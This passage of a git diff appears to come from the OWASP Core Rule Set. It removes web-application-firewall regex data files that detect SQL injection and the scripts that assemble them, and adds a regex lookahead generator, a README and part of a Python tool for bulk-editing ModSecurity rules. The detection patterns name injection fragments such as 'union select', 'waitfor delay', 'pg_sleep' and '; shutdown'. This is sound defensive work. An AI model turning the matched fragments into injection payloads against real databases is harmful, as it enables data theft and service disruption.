-load\s*?\(\s*?space\s*?\( -alter\s*?\(\s*?space\s*?\( -delete\s*?\(\s*?space\s*?\( -update\s*?\(\s*?space\s*?\( -insert\s*?\(\s*?space\s*?\( -desc\s*?\(\s*?space\s*?\( diff --git a/util/regexp-assemble/regexp-942210.data b/util/regexp-assemble/regexp-942210.data deleted file mode 100644 index 1dd373cb81..0000000000 --- a/util/regexp-assemble/regexp-942210.data +++ /dev/null @@ -1,40 +0,0 @@ -@.+=\s*?\(\s*?select -\d\s*?or\s*?\d+\s*?[\-+] -\d\s*?xor\s*?\d+\s*?[\-+] -\d\s*?div\s*?\d+\s*?[\-+] -\d\s*?like\s*?\d+\s*?[\-+] -\d\s*?between\s*?\d+\s*?[\-+] -\d\s*?and\s*?\d+\s*?[\-+] -\/\w+;?\s+having\W -\/\w+;?\s+and\W -\/\w+;?\s+or\W -\/\w+;?\s+xor\W -\/\w+;?\s+div\W -\/\w+;?\s+like\W -\/\w+;?\s+between\W -\/\w+;?\s+select\W -\d\s+group\s+by.+\( -;\s*?drop -#\s*?drop ---\s*?drop -;\s*?alter -#\s*?alter ---\s*?alter -;\s*?update\s*?\w{2,} -#\s*?update\s*?\w{2,} ---\s*?update\s*?\w{2,} -;\s*?insert\s*?\w{2,} -#\s*?insert\s*?\w{2,} ---\s*?insert\s*?\w{2,} -[^\w]SET\s*?@\w+ -and[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -nand[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -or[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -xor[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -xxor[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -div[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -like[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -between[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -not[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -\|\|[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -\&\&[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] diff --git a/util/regexp-assemble/regexp-942240.data b/util/regexp-assemble/regexp-942240.data deleted file mode 100644 index 48d0701488..0000000000 --- a/util/regexp-assemble/regexp-942240.data +++ /dev/null @@ -1,5 +0,0 @@ -alter\s*?\w+.*?character\s+set\s+\w+ -alter\s*?\w+.*?char\s+set\s+\w+ -[\"'`];*?\s*?waitfor\s+time\s+[\"'`] -[\"'`];*?\s*?waitfor\s+delay\s+[\"'`] -[\"'`];.*?:\s*?goto diff --git a/util/regexp-assemble/regexp-942260.data b/util/regexp-assemble/regexp-942260.data deleted file mode 100644 index 697ac400db..0000000000 --- a/util/regexp-assemble/regexp-942260.data +++ /dev/null @@ -1,22 +0,0 @@ -union\s*?\s*?[([]*?\s*?select\s+ -union\s*?all\s*?[([]*?\s*?select\s+ -union\s*?distinct\s*?[([]*?\s*?select\s+ -union\s*?[(!@]*?\s*?[([]*?\s*?select\s+ -\w\s+like\s+[\"'`] -like\s*?[\"'`]\% -[\"'`]\s*?like\W*?[\"'`\d] -[\"'`]\s*?and\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?nand\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?or\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?xor\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?xxor\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?div\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?like\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?between\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?not\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?\|\|\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?\&\&\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?\*\s*?\w+\W+[\"'`] -[\"'`]\s*?[^?\w\s=.,;)(]++\s*?[(@\"'`]*?\s*?\w+\W+\w -select\s+?[\[\]()\s\w\.,\"'`-]+from\s+ -find_in_set\s*?\( diff --git a/util/regexp-assemble/regexp-942280.data b/util/regexp-assemble/regexp-942280.data deleted file mode 100644 index 5033a8200b..0000000000 --- a/util/regexp-assemble/regexp-942280.data +++ /dev/null @@ -1,7 +0,0 @@ -select\s*?pg_sleep -waitfor\s*?delay\s?[\"'`]+\s?\d -;\s*?shutdown\s*?; -;\s*?shutdown\s*?-- -;\s*?shutdown\s*?# -;\s*?shutdown\s*?\/\* -;\s*?shutdown\s*?{ diff --git a/util/regexp-assemble/regexp-942300.data b/util/regexp-assemble/regexp-942300.data deleted file mode 100644 index d35b538c94..0000000000 --- a/util/regexp-assemble/regexp-942300.data +++ /dev/null @@ -1,18 +0,0 @@ -\)\s*?when\s*?\d+\s*?then -[\"'`]\s*?# -[\"'`]\s*?-- -[\"'`]\s*?{ -\/\*!\s?\d+ -char\s*?\(\s*?\d -chr\s*?\(\s*?\d -and\s+\s*?\w+\( -nand\s+\s*?\w+\( -or\s+\s*?\w+\( -xor\s+\s*?\w+\( -xxor\s+\s*?\w+\( -div\s+\s*?\w+\( -like\s+\s*?\w+\( -between\s+\s*?\w+\( -not\s+\s*?\w+\( -\|\|\s+\s*?\w+\( -\&\&\s+\s*?\w+\( diff --git a/util/regexp-assemble/regexp-942320.data b/util/regexp-assemble/regexp-942320.data deleted file mode 100644 index f0c6158c02..0000000000 --- a/util/regexp-assemble/regexp-942320.data +++ /dev/null @@ -1,7 +0,0 @@ -create\s+function\s*?\w+\s*?\(\s*?\)\s*?- -create\s+procedure\s*?\w+\s*?\(\s*?\)\s*?- -declare[^\w]+[@#]\s*?\w+ -exec\s*?\(\s*?@ -procedure\s+analyse\s*?\( -;\s*?declare\s+[\w-]+ -;\s*?open\s+[\w-]+ diff --git a/util/regexp-assemble/regexp-942330.data b/util/regexp-assemble/regexp-942330.data deleted file mode 100644 index 222ca2dd53..0000000000 --- a/util/regexp-assemble/regexp-942330.data +++ /dev/null @@ -1,46 +0,0 @@ -[\"'`]\s*?or\s*?[\"'`]?\d -[\"'`]\s*?xor\s*?[\"'`]?\d -[\"'`]\s*?div\s*?[\"'`]?\d -[\"'`]\s*?like\s*?[\"'`]?\d -[\"'`]\s*?between\s*?[\"'`]?\d -[\"'`]\s*?and\s*?[\"'`]?\d -\\\\x(?:23|27|3d) -^.?[\"'`]$ -^[\"'`\\\\]*?[\d\"'`]+\s*?and\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?nand\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?or\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?xor\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?xxor\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?div\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?like\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?between\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?not\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?\|\|\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?\&\&\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?and\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?nand\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?or\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?xor\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?xxor\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?div\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?like\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?between\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?not\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?\|\|\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?\&\&\s*?[\w\"'`][+&!@(),.-] -[^\w\s]\w+\s*?[|-]\s*?[\"'`]\s*?\w -@\w+\s+and\s*?[\"'`\d]+ -@\w+\s+or\s*?[\"'`\d]+ -@\w+\s+xor\s*?[\"'`\d]+ -@\w+\s+div\s*?[\"'`\d]+ -@\w+\s+like\s*?[\"'`\d]+ -@\w+\s+between\s*?[\"'`\d]+ -@[\w-]+\sand\s*?[^\w\s] -@[\w-]+\sor\s*?[^\w\s] -@[\w-]+\sxor\s*?[^\w\s] -@[\w-]+\sdiv\s*?[^\w\s] -@[\w-]+\slike\s*?[^\w\s] -@[\w-]+\sbetween\s*?[^\w\s] -[^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`]. -\Winformation_schema -table_name\W diff --git a/util/regexp-assemble/regexp-942340.data b/util/regexp-assemble/regexp-942340.data deleted file mode 100644 index 0d9d9a6fbe..0000000000 --- a/util/regexp-assemble/regexp-942340.data +++ /dev/null @@ -1,17 +0,0 @@ -in\s*?[(]+\s*?select -(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+regexp\s*?\( -(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+sounds\s+like\s*?[\"'`] -(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+[=\d]+x -[\"'`]\s*?\d\s*?-- -[\"'`]\s*?\d\s*?# -[\"'`][\%&<>^=]+\d\s*?= -[\"'`][\%&<>^=]+\d\s*?or -[\"'`][\%&<>^=]+\d\s*?xor -[\"'`][\%&<>^=]+\d\s*?div -[\"'`][\%&<>^=]+\d\s*?like -[\"'`][\%&<>^=]+\d\s*?between -[\"'`][\%&<>^=]+\d\s*?and -[\"'`]\W+[\w+-]+\s*?=\s*?\d\W+[\"'`] -[\"'`]\s*?is\s*?\d.+[\"'`]?\w -[\"'`][|]?[\w-]{3,}[^\w\s.,]+[\"'`] -[\"'`]\s*?is\s*?[\d.]+\s*?\W.*?[\"'`] diff --git a/util/regexp-assemble/regexp-942350.data b/util/regexp-assemble/regexp-942350.data deleted file mode 100644 index fb60a831f3..0000000000 --- a/util/regexp-assemble/regexp-942350.data +++ /dev/null @@ -1,11 +0,0 @@ -create\s+function\s+.+\s+returns -;\s*?alter\b\s*?[\[(]?\w{2,} -;\s*?create\b\s*?[\[(]?\w{2,} -;\s*?delete\b\s*?[\[(]?\w{2,} -;\s*?desc\b\s*?[\[(]?\w{2,} -;\s*?insert\b\s*?[\[(]?\w{2,} -;\s*?load\b\s*?[\[(]?\w{2,} -;\s*?rename\b\s*?[\[(]?\w{2,} -;\s*?select\b\s*?[\[(]?\w{2,} -;\s*?truncate\b\s*?[\[(]?\w{2,} -;\s*?update\b\s*?[\[(]?\w{2,} diff --git a/util/regexp-assemble/regexp-942370.data b/util/regexp-assemble/regexp-942370.data deleted file mode 100644 index 7edf306c0a..0000000000 --- a/util/regexp-assemble/regexp-942370.data +++ /dev/null @@ -1,19 +0,0 @@ -[\"'`]\s*?\*.+or\W*?[\"'`]\d -[\"'`]\s*?\*.+xor\W*?[\"'`]\d -[\"'`]\s*?\*.+div\W*?[\"'`]\d -[\"'`]\s*?\*.+like\W*?[\"'`]\d -[\"'`]\s*?\*.+between\W*?[\"'`]\d -[\"'`]\s*?\*.+and\W*?[\"'`]\d -[\"'`]\s*?\*.+id\W*?[\"'`]\d -\^[\"'`] -[\"'`]\s*?[^\w\s?]+\s*?[^\w\s]+\s*?[\"'`] -[\"'`]\s*?[^\w\s]+\s*?[\W\d].*?# -[\"'`]\s*?[^\w\s]+\s*?[\W\d].*?-- -[\"'`].*?\*\s*?\d -[\"'`]\s*?or\s[^\d]+[\w-]+.*?\d -[\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d -[\"'`]\s*?div\s[^\d]+[\w-]+.*?\d -[\"'`]\s*?like\s[^\d]+[\w-]+.*?\d -[\"'`]\s*?between\s[^\d]+[\w-]+.*?\d -[\"'`]\s*?and\s[^\d]+[\w-]+.*?\d -[()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] diff --git a/util/regexp-assemble/regexp-942380.data b/util/regexp-assemble/regexp-942380.data deleted file mode 100644 index da4a07cf46..0000000000 --- a/util/regexp-assemble/regexp-942380.data +++ /dev/null @@ -1,19 +0,0 @@ -\b(?i:having)\b\s+\d{1,10}\s*?[=<>] -\b(?i:having)\b\s+'[^=]{1,10}'\s*?[=<>] -(?i:\bexecute\() -(?i:\bexecute\s{1,5}[\w\.$]{1,5}\s{0,3}) -\bhaving\b ?\d{1,10} ?[=<>]+ -\bhaving\b ?[\'\"][^=]{1,10}[\'\" ?[=<>]+ -(?i:\bcreate\s+?table.{0,20}?\() -(?i:\blike\W*?char\W*?\() -(?i:select.*?case) -(?i:from.*?limit) -(?i:order\sby) -exists\s\sselect -exists\sselect\Sif\s\( -exists\sselect\Sifnull\s\( -exists\sselect\Stop -exists\sselect\Sconcat -exists\ssystem\s\( -exists\s\b(?i:having)\b\s+\d{1,10} -exists\s'[^=]{1,10}' diff --git a/util/regexp-assemble/regexp-942390.data b/util/regexp-assemble/regexp-942390.data deleted file mode 100644 index 4fff94b431..0000000000 --- a/util/regexp-assemble/regexp-942390.data +++ /dev/null @@ -1,12 +0,0 @@ -(?i:\bor\b ?\d{1,10} ?[=<>]+) -(?i:\bor\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+) -(?i:'\s+or\s+.{1,20}[+\-!<>=]) -(?i:'\s+xor\s+.{1,20}[+\-!<>=]) -\b(?i:or)\b\s+\d{1,10} -\b(?i:or)\b\s+'[^=]{1,10}' -\b(?i:xor)\b\s+\d{1,10} -\b(?i:xor)\b\s+'[^=]{1,10}' -\b(?i:or)\b\s+\d{1,10}\s*?[=<>] -\b(?i:xor)\b\s+\d{1,10}\s*?[=<>] -\b(?i:or)\b\s+'[^=]{1,10}'\s*?[=<>] -\b(?i:xor)\b\s+'[^=]{1,10}'\s*?[=<>] diff --git a/util/regexp-assemble/regexp-assemble-v2.pl b/util/regexp-assemble/regexp-assemble-v2.pl deleted file mode 100755 index cb0e677305..0000000000 --- a/util/regexp-assemble/regexp-assemble-v2.pl +++ /dev/null @@ -1,29 +0,0 @@ -#!/usr/bin/env perl -# -# Create one regexp from a set of regexps. -# Regexps can be submitted via standard input, one per line. -# -# Requires Regexp::Assemble Perl module. -# To install: cpan install Regexp::Assemble -# -# See: https://coreruleset.org/20190826/optimizing-regular-expressions/ -# - -use strict; -use Regexp::Assemble; - -my $ra = Regexp::Assemble->new; -while (<>) -{ - # Handle possessive qualifiers - # https://rt.cpan.org/Public/Bug/Display.html?id=50228#txn-672717 - my $arr = $ra->lexstr($_); - for (my $n = 0; $n < $#$arr - 1; ++$n) - { - if ($arr->[$n] =~ /\+$/ and $arr->[$n + 1] eq '+') { - $arr->[$n] .= splice(@$arr, $n + 1, 1); - } - } - $ra->insert(@$arr); -} -print $ra->as_string() . "\n"; diff --git a/util/regexp-assemble/regexp-assemble.pl b/util/regexp-assemble/regexp-assemble.pl deleted file mode 100755 index a74b530f1a..0000000000 --- a/util/regexp-assemble/regexp-assemble.pl +++ /dev/null @@ -1,20 +0,0 @@ -#!/usr/bin/env perl -# -# Create one regexp from a set of regexps. -# Regexps can be submitted via standard input, one per line. -# -# Requires Regexp::Assemble Perl module. -# To install: cpan install Regexp::Assemble -# -# See: https://coreruleset.org/20190826/optimizing-regular-expressions/ -# - -use strict; -use Regexp::Assemble; - -my $ra = Regexp::Assemble->new; -while (<>) -{ - $ra->add($_); -} -print $ra->as_string() . "\n"; diff --git a/util/regexp-assemble/regexp-cmdline.py b/util/regexp-assemble/regexp-cmdline.py deleted file mode 100755 index 8189970110..0000000000 --- a/util/regexp-assemble/regexp-cmdline.py +++ /dev/null @@ -1,64 +0,0 @@ -#!/usr/bin/env python -# -# Convert a word list to a list of regexps usable by Regexp::Assemble. -# -# Examples: -# cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl -# cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl -# cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl -# -# Refer to rule 932100, 932110, 932150 for documentation. -# - -import fileinput, string, sys - -# Convert a single line to regexp format, and insert anti-cmdline -# evasions between characters. -def regexp_str(str, evasion): - # By convention, if the line starts with ' char, copy the rest - # verbatim. - if str[0] == "'": - return str[1:] - - result = '' - for i, char in enumerate(str): - if i > 0: - result += evasion - result += regexp_char(char, evasion) - - return result - -# Ensure that some special characters are escaped -def regexp_char(char, evasion): - char = str.replace(char, '.', '\.') - char = str.replace(char, '-', '\-') - char = str.replace(char, '+', r'''(?:\s|<|>).*''') - # Unix: "cat foo", "catfoo" - char = str.replace(char, '@', r'''(?:[\s,;]|\.|/|<|>).*''') - # Windows: "more foo", "more,foo", "more;foo", "more.com", "more/e", - # "morefoo" - char = str.replace(char, ' ', '\s+') - # Ensure multiple spaces are matched - return char - -# Insert these sequences between characters to prevent evasion. -# This emulates the relevant parts of t:cmdLine. -evasions = { - 'unix': r'''[\\\\'\"]*''', - 'windows': r'''[\"\^]*''', -} - -# Parse arguments -if len(sys.argv) <= 1 or not sys.argv[1] in evasions: - print(sys.argv[0] + ' unix|windows [infile]') - sys.exit(1) - -evasion = evasions[sys.argv[1]] -del sys.argv[1] - -# Process lines from input file, or if not specified, standard input -for line in fileinput.input(): - line = line.rstrip('\n ') - line = line.split('#')[0] - if line != '': - print(regexp_str(line, evasion)) diff --git a/util/regexp-tricks/negative-lookahead.py b/util/regexp-tricks/negative-lookahead.py new file mode 100644 index 0000000000..0145ef39ec --- /dev/null +++ b/util/regexp-tricks/negative-lookahead.py @@ -0,0 +1,121 @@ +import argparse + +# WARNING: This script is EXPERIMENTAL. Use with caution. +# +# Known issues: +# * At the moment, it will probably not work with more than two strings. +# +# Known limitations: +# * Any substrings of a target string will also NOT be matched. This is probably due to a limitation in this technique, +# make sure that subtrings of the negative lookahead are not harmful in any way. + +parser = argparse.ArgumentParser(description="This script takes a list of strings and converts them into \ + a regex that acts like a negative lookahead") +parser.add_argument("strings", type=str, nargs='+', + help="the strings to convert into a negative lookahead") +parser.add_argument("--prefix", type=str, default="", + help="sets a prefix for the resulting regex") +parser.add_argument("--suffix", type=str, default="", + help="sets a suffix for the resulting regex") + +args = parser.parse_args() + +# Return the longest prefix of all list elements. Shamelessly copied from: +# https://stackoverflow.com/questions/6718196/determine-the-common-prefix-of-multiple-strings +def commonprefix(m): + "Given a list of pathnames, returns the longest common leading component" + if not m: return '' + s1 = min(m) + s2 = max(m) + for i, c in enumerate(s1): + if c != s2[i]: + return s1[:i] + return s1 + +# flatten returns a string with concatenated dictionary keys +def flatten(dict): + s = "" + + for key in dict.keys(): + s += key + + return s + +# set returns a character set containing the unique characters across all strings for the given index +def set(strings, index, flags): + dict = {} + + for s in strings: + # Continue so we don't panic + if index > len(s) -1: + continue + + dict[s[index]] = '' + + return "[" + flags + flatten(dict) + "]" + +# prepare converts a string for negative lookaheads emulation +def prepare(s, offset): + r = "" + + if len(s) == 0: + return r + + for i in range(offset, len(s)): + for j in range(0, i + 1): + if j == i: + r += "[^" + s[j] + "]" + else: + r += s[j] + + if i != len(s) - 1: + r += "|" + + return r + +# run runs the +def run(): + strings = args.strings + + r = "" + r += set(strings, 0, "^") + + c = "" + d = {} + + # Only find common string if we have more than one + if len(strings) > 1: + c = commonprefix(strings) + + # Collect all characters after the common substring from every string + for s in strings: + if len(s) > len(c) and s.startswith(c): + d[s[len(c)]] = '' + + # Add the common string to the regex to prevent accidental matching + if len(c) > 0: + if len(c) > 1: + r += "|" + "(?:" + prepare(c, 1) + ")" + + r += "|" + "(?:" + c + "[^" + flatten(d) + "]" + ")" + + for s in strings: + g = "" + + # When the common string is > 0, offset with len(c) + 1 because we handled this earlier + if len(c) > 0: + g = prepare(s, len(c) + 1) + else: + g = prepare(s, 1) + + # Add OR boolean if necessary + if len(g) > 0: + r += "|" + + r += g + + print(args.prefix + "(?:" + r + ")" + args.suffix) + +# Only run if script is called directly +if __name__ == "__main__": + run() diff --git a/util/rule_ctl/README.md b/util/rule_ctl/README.md new file mode 100644 index 0000000000..374b37e17c --- /dev/null +++ b/util/rule_ctl/README.md @@ -0,0 +1,135 @@ +draft + +# OWASP CRS Rule Control Script +This script aims to help when a bulk change on configuration files is needed. rule_ctl.py can, for example, change the value of an action on all rules, or can add/remove/rename a tag on each rule in a file, or can add/remove a transformation function only in rules that match range 942100-942190, etc... + +## Example Usage + +There're only two mandatory parameters: `--config` and `--filter-rule-id`. + +**--config** set the target config file
+**--filter-rule-id** a regex that matches only rule ids to change + +For example, if you want to add a new tag on each rule in file `REQUEST-933-APPLICATION-ATTACK-PHP.conf` you can do: + +```sh +python3 util/rule_ctl/rule_ctl.py \ + --config rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf \ + --filter-rule-id ^933.+ \ + --append-tag foo + --dryrun +``` + +`--dryrun` sends to stdout the result of changes and prevent writing changes on file. It's a good idea to always check all commands with dryrun before overwrite the target configuration file. + +You can even alphabetically sort tag list while adding new tags: +```sh +python3 util/rule_ctl/rule_ctl.py \ + --config rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf \ + --filter-rule-id ^933.+ \ + --append-tag foo + --sort-tag + --dryrun +``` + +## Variables +- `--append-variable`: Append a variable on the variable list of selected rules +- `--remove-variable`: Remove exact matching variable from selected rules +- `--replace-variable`: Replace variable on selected rules + +### Examples +Replace the variable name `ARGS` with `ARGS_GET` +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --replace-variable ARGS,ARGS_GET \ + --dryrun +``` + +Replace the variable `ARGS` with `!ARGS_GET:'lisa'` +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --replace-variable ARGS,\!ARGS_GET:\'lisa\' \ + --dryrun +``` + +## Tags +- `--append-tag`: Append a new tag to the tag list on selected rules +- `--remove-tag`: Remove tag from tag list on selected rules +- `--rename-tag`: Rename tag on selected rules +- `--sort-tags`: Alphabetically sort tag list on selected rules + +### Examples +Append a new tag `foo` and sort tag list +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --append-tag foo \ + --sort-tags \ + --dryrun +``` + +Remove a tag `foo` +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --remove-tag foo \ + --dryrun +``` + +Rename a tag `foo` +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --rename-tag foo,bar \ + --dryrun +``` + +## Transformation Functions +- `--append-tfunc`: Append a new transformation function on selected rules +- `--remove-tfunc`: Remove a transformation function on selected rules + +### Examples +Append `t:lowercase` to all selected rules (you don't need the `t:` prefix) +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --append-tfunc lowercase \ + --dryrun +``` + +## Actions +- `--replace-action`: Replace action on selected rules +- `--remove-action`: remove action from selected rules + +### Examples +Replace action `severity:CRITICAL` with `severity:INFO` and set a new message on rule id 125 +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^125 \ + --replace-action severity:CRITICAL,severity:INFO \ + --uncond-replace-action 'msg:this is a new message for rule 125' \ + --dryrun +``` + +## CTL +- `--append-ctl`: Append a new ctl action on selected rules + +### Examples +Remove rule id 1337 on rule 125 by adding ctl:ruleRemoveById=1337. Do it on main rule (skipping chained rules if present) +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^125 \ + --append-ctl ruleRemoveById=1337 \ + --skip-chain \ + --dryrun +``` + +## Others +- `--target-file`: Set the target file where changes will be saved (default: use file set by `--config`) +- `--skip-chain`: Skip chained rules +- `--dryrun`: Do not write any changes, just output the results +- `--debug`: Show debug messages +- `--silent`: Used with `--dryrun` and `--debug` doesn't write and shows only debug messages +- `--json`: Used with `--dryrun` return the msc_pyparser JSON output instead of ModSecurity file diff --git a/util/rule_ctl/pyproject.toml b/util/rule_ctl/pyproject.toml new file mode 100644 index 0000000000..77c7e6effc --- /dev/null +++ b/util/rule_ctl/pyproject.toml @@ -0,0 +1,5 @@ +[tool.pytest.ini_options] +minversion = "6.0" +testpaths = [ + "tests", +] diff --git a/util/rule_ctl/requirements.txt b/util/rule_ctl/requirements.txt new file mode 100644 index 0000000000..2e1b1f04f6 --- /dev/null +++ b/util/rule_ctl/requirements.txt @@ -0,0 +1,3 @@ +argparse +msc_pyparser +pytest diff --git a/util/rule_ctl/rule_ctl.py b/util/rule_ctl/rule_ctl.py new file mode 100755 index 0000000000..afa4f155a0 --- /dev/null +++ b/util/rule_ctl/rule_ctl.py @@ -0,0 +1,801 @@ +#! /usr/bin/env python + +import sys, re, json, uuid + +try: + import argparse, msc_pyparser +except: + print(f"Error: missing modules.\nYou can install all dependences with: pip3 install -r requirements.txt") + sys.exit(1) + +ACTION_ORDER = { + key: index for index, key in enumerate( + [ + "id", + "phase", + "allow", + "block", + "deny", + "drop", + "pass", + "proxy", + "redirect", + "status", + "capture", + "t", + "log", + "nolog", + "auditlog", + "noauditlog", + "msg", + "logdata", + "tag", + "sanitiseArg", + "sanitiseRequestHeader", + "sanitiseMatched", + "sanitiseMatchedBytes", + "ctl", + "ver", + "severity", + "multiMatch", + "initcol", + "setenv", + "setvar", + "expirevar", + "chain", + "skip", + "skipAfter" + ] + ) +} + +class Context(object): + def __init__(self): + self.args = () + self.line_number_change = 0 + self.next_index_to_parse = 0 + self.parser = None + self._rules = [] + self._rules_map = {} + + def parse_rules(self, data): + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data, debug = False) + + for line in mparser.configlines: + type = line["type"] + if type == "SecAction": + rule = SecAction(line, self) + elif type == "Comment": + rule = Comment(line, self) + elif type == "SecRule": + rule = SecRule(line, self) + else: + rule = Directive(line, self) + + self._rules.append(rule) + if isinstance(rule, SecAction): + if rule.is_chained(): + self._rules_map[rule.id]['chained'].append(rule) + else: + self._rules_map[rule.id] = { + 'rule': rule, + 'chained': [] + } + yield rule + + def get_chain_starter_rule(self, rule): + try: + self._rules_map[rule.id]['rule'] + except KeyError: + # Chained rules don't have ID during initialization. + # In this case, however, the last parsed rule now has one + return self._rules_map[self._rules[-1].id]['rule'] + + def dprint(self, rule_id, action, message, indent): + if not indent: + indent=0 + + prefix = "[*]" + if indent > 0: + prefix = "`" + + if not rule_id: + rule_id = "chained" + + print(f'{" "*int(indent)}{prefix} \033[92m{rule_id}/{action}\033[0m: {message}') + + def generate_output(self): + mwriter = msc_pyparser.MSCWriter(self.generate_lines()) + mwriter.generate() + return mwriter.output + + def generate_lines(self): + generated_lines = [] + line_number_change = 0 + for rule in self._rules: + lines, line_number_change = rule.generate_lines(line_number_change) + generated_lines.append(lines) + return generated_lines + + def parse_arguments(self, args=None): + args_parser = self._create_args_parser() + self.args = args_parser.parse_args(args) + + def _create_args_parser(self): + parser = argparse.ArgumentParser(description="OWASP CRS Configuration Control") + parser.add_argument("--config", dest="config", help="OWASP ModSecurity CRS config file path", required=True) + parser.add_argument("--filter-rule-id", dest="filter_rule_id", help="Filter on ruleid (regex)", required=False) + parser.add_argument("--append-variable", dest="append_variable", help="Append var on SecRule (string)", action='append', required=False) + parser.add_argument("--remove-variable", dest="remove_variable", help="Remove var from SecRule (string)", action='append', required=False) + parser.add_argument("--replace-variable", dest="replace_variable", help="Replace var in SecRule (old,new) (string)", action='append', required=False) + parser.add_argument("--append-tag", dest="append_tag", help="Append tag on SecRule (string)", required=False) + parser.add_argument("--remove-tag", dest="remove_tag", help="Remove tag from SecRule (string)", required=False) + parser.add_argument("--rename-tag", dest="rename_tag", help="Rename tag on SecRule (old,new) (string)", required=False) + parser.add_argument("--sort-tags", dest="sort_tags", help="Sort tag list in SecRule", action="store_true", required=False) + parser.add_argument("--append-tfunc", dest="append_tfunc", help="Append transformation func on SecRule (example: urlDecodeUni) (string)", action='append', required=False) + parser.add_argument("--remove-tfunc", dest="remove_tfunc", help="Remove transformation func from SecRule (example: urlDecodeUni) (string)", action='append', required=False) + parser.add_argument("--append-action", dest="append_action", help="Append action on Secrule (example: 'severity:CRITICAL) (string)", required=False) + parser.add_argument("--replace-action", dest="replace_action", help="Replace action (example: 'severity:CRITICAL,severity:INFO') (string)", required=False) + parser.add_argument("--remove-action", 